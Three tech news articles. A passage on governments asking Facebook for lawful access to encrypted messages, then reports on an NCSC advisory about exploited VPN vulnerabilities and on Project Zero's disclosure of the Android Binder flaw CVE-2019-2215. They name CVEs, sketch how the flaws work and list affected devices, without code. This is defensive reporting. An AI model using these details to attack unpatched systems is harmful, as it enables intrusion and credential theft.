crimes. The letter reads, “We must find a way to balance the need to secure data with public safety and the need for law enforcement to access the information they need to safeguard the public, investigate crimes, and prevent future criminal activity.” The letter does praise Facebook of reporting 16.8 million cases to the US National Center for Missing & Exploited Children (NCMEC), which was more than 90% of the 18.4 million total reports in 2018. It further states that Facebook’s own safety systems were able to identify the 99% of the content Facebook takes action against, both for child sexual exploitation and terrorism. However, the governments believe that “the mere numbers cannot capture the significance of the harm to children.” This is not the first time government officials have shown their dislike with end-to-end encryption. In 2017, Amber Rudd, the UK's home secretary said after WhatsApp added end-to-end encryption, “We need to make sure that organizations like WhatsApp, and there are plenty of others like that, don't provide a secret place for terrorists to communicate with each other.” In December 2018, the Australian government passed a controversial anti-encryption law that allows law enforcement agencies to compel tech companies to hand over encrypted messaging data. Read also: “Five Eyes” call for backdoor access to end-to-end encryption to tackle ‘emerging threats’ despite warnings from cybersecurity and civil rights communities The government has listed the following steps for Facebook and other similar companies: The system should be designed in such a way that the companies behind them are able to effectively act against any illegal content without hampering the safety of others. Allow law enforcement to get lawful access to content in a readable and usable format. Engage in consultation with governments and let those consultations influence companies’ design decisions. The proposed changes should not be implemented until the safety of users is fully ensured by tested and operational systems. What privacy experts and users think about this open letter to Facebook Electronic Frontier Foundation (EFF), a non-profit that supports civil liberties and other legal issues pertaining to digital rights, called this act a “staggering attempt to undermine the security and privacy of communications tools used by billions of people." It said, "Facebook should not comply.” The organization further said that the three governments failed to take into account the “severe risks” associated with introducing backdoors. https://twitter.com/EFF/status/1180978792052998145 The open letter to Facebook also did not sit well with several users. In a discussion on Hacker News users expressed that it would be wrong to undermine the security for millions of law-abiding users in order to investigate the wrongdoers. A user commented, “Privacy isn't a trade-off against security, it's a necessary component of having security.” Another user added, “Criminal activities are exacerbated by the internet it would be a lie to say no. But just like with cars, scooters, or any tech that's sufficiently democratized. They need a permit for a car? Why not just steal it? I need an identity to do shady stuff on the internet? Why not steal it? We cannot reason with malevolent forces, there is always going to be away. And by that time, we compiled the data of everyone, centralized it all, and let govs that don't understand the implication collect those as if it was mere petrol or gold. We are putting everyone's lives at risk doing so, just wait until it leaks out or it starts getting sold. (ahem, oh wait !)” Read the open letter to Facebook for more details. DoorDash data breach leaks personal details of 4.9 million customers, workers, and merchants Google Project Zero discloses a zero-day Android exploit in Pixel, Huawei, Xiaomi and Samsung devices How has ethical hacking benefited the software industry Cryptographic key of Facebook’s Free Basics app has been compromised Facebook must face privacy class action lawsuit, loses facial recognition appeal, U.S. Court of Appeals rules

Last week, the National Cyber Security Centre (NCSC) reported that they are investigating the exploitation, by Advanced Persistent Threat (APT) actors, of known vulnerabilities in VPN products. These VPN products are from vendors like Pulse secure, Palo Alto and Fortinet. It is an ongoing activity, targeted to the UK and other international organizations. According to NCSC, affected sectors include government, military, academic, business and healthcare. Vulnerabilities exist in several SSL VPN products As per the report, vulnerabilities exist in several SSL VPN products that can allow an attacker to retrieve arbitrary files containing authentication credentials. An attacker can use these stolen credentials to connect to the VPN and change configuration settings or connect to further internal infrastructure. The report also highlights that unauthorized connection to a VPN can provide the attacker with the privileges needed to run secondary exploits aimed at accessing a root shell. Read Also: MITRE’s 2019 CWE Top 25 most dangerous software errors list released Top Vulnerabilities in VPN exploited by APTs The highest-impact vulnerabilities known to be exploited by APTs are listed below: Pulse Connect Secure: CVE-2019-11510: Pre-auth arbitrary file reading CVE-2019-11539: Post-auth command injection Fortinet: CVE-2018-13379: Pre-auth arbitrary file reading CVE-2018-13382: Allows an unauthenticated attacker to change the password of an SSL VPN web portal user CVE-2018-13383: Post-auth heap overflow. This allows an attacker to gain a shell running on the router Palo Alto: CVE-2019-1579: Palo Alto Networks GlobalProtect Portal NCSC suggests that users of these VPN products should investigate their logs for evidence of compromise, especially if the security patches were not applied immediately after their release. Additionally, administrators should look for evidence of compromised accounts in active use, such as anomalous IP locations or times. The report also covers product-specific advice to detect exploitation in VPN connections. Steps to mitigate the vulnerabilities in VPN NCSC provides essential steps to be taken to mitigate the risk of these vulnerabilities. They suggest that owners of vulnerable products should take two steps promptly: Apply the latest security patches released by vendors Reset authentication credentials associated with affected VPNs and accounts connecting through them The most effective way to mitigate the risk of actors exploiting these vulnerabilities is to ensure that the affected products are patched with the latest security updates. Pulse secure, Palo Alto and Fortinet have released patches for these vulnerabilities. NCSC also emphasizes on reporting any current activity related to these threats at [email protected] where they will offer help and guidance. On Hacker News, this report has gained significant traction and users are discussing the nature of various VPN products and services. One of them commented, “Commercial enterprise VPN products are an open sewer, and there aren't any, from any vendor, that I trust. I don't like OpenVPN or strongSwan, but you'd be better off with either of them than you would be with a commercial VPN appliance. The gold standard, as ever, is Wireguard.” To know more about this report, check out the official NCSC website. An unpatched security issue in the Kubernetes API is vulnerable to a “billion laughs” attack Google Project Zero discloses a zero-day Android exploit in Pixel, Huawei, Xiaomi and Samsung devices 10 times ethical hackers spotted a software vulnerability and averted a crisis A Cargo vulnerability in Rust 1.25 and prior makes it ignore the package key and download a wrong dependency VLC media player affected by a major vulnerability in a 3rd library, libebml; updating to the latest version may help

Google’s Project Zero disclosed a zero-day Android exploit in popular devices from Pixel, Huawei, Xiaomi, and Samsung, last Friday. This flaw unlocks root-level access and requires no or minimal customization to root a phone that’s exposed to the bug. A similar Android OS flaw was fixed in 2017 but has now found its way on newer software versions as well. The researchers speculate that this vulnerability is attributed to the NSO group based in Israel. Google has published a proof of concept which states that it is a kernel privilege escalation which uses a ‘use-after-free’ vulnerability, accessible from inside the Chrome sandbox. How does the zero-day Android exploit work As described in the upstream commit, “binder_poll() passes the thread->wait waitqueue that can be slept on for work. When a thread that uses epoll explicitly exits using BINDER_THREAD_EXIT, the waitqueue is freed, but it is never removed from the corresponding epoll data structure. When the process subsequently exits, the epoll cleanup code tries to access the waitlist, which results in a use-after-free.” Basically, the zero-day Android exploit can gain arbitrary kernel read/write when running locally. If the exploit is delivered via the web, it only needs to be paired with a renderer exploit, as this vulnerability is accessible through the sandbox. The vulnerability is exploitable in Chrome's renderer processes under Android's 'isolated_app' SELinux domain, making Binder as the vulnerable component. Affected devices include Pixel, Pixel XL, Pixel 2, Pixel 2 XL, Huawei P20, Redmi 5A, Redmi Note 5, Mi A1, Oppo A3, Moto Z3, Oreo LG phones, Samsung Galaxy S7, Samsung Galaxy S8, and Samsung Galaxy S9.  This vulnerability was earlier patched in the Linux kernel version 4.14 and above, but without a CVE. Now, the vulnerability is being tracked as CVE-2019-2215. “This issue is rated as High severity on Android and by itself requires installation of a malicious application for potential exploitation. Any other vectors, such as via web browser, require chaining with an additional exploit,” Project Zero member Tim Willis wrote in the post. Project Zero normally offers a 90-day timeline for developers to fix an issue before making it public, but since this vulnerability was exploited in the wild, it was published in just seven days. In case 7 days elapse or a patch is made broadly available (whichever is earlier), the bug report will become visible to the public. Google said that affected Pixel devices will have the zero-day Android exploit patched in the upcoming October 2019 Android security update. Other OEMs have not yet acknowledged the vulnerability, but should ideally release patches soon. An unpatched security issue in the Kubernetes API is vulnerable to a “billions laugh attack” An unpatched vulnerability in NSA’s Ghidra allows a remote attacker to compromise exposed systems A Cargo vulnerability in Rust 1.25 and prior makes it ignore the package key and download a wrong dependency. New iPhone exploit checkm8 is unpatchable and can possibly lead to permanent jailbreak on iPhones. Google’s Project Zero reveals several serious zero-day vulnerabilities in a fully remote attack surface of the iPhone.